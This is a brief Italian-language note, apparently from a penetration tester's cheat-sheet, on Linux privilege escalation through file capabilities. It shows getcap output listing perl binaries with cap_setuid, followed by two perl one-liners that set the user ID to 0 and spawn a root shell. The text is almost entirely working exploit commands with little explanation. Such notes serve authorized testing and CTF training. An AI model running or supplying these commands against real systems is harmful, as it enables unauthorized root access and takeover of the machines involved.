tags: Capabilities_Priv_esc priv_esc Priv_Esc_Cap
Se tramite questo comando appare questo output:
getcap -r / 2>/dev/null | sort
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+epPossiamo ottenere una shell di root se abbiamo il permesso:
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# oppure
/usr/bin/perl -e 'use POSIX; POSIX::setuid(0); system("/bin/bash");'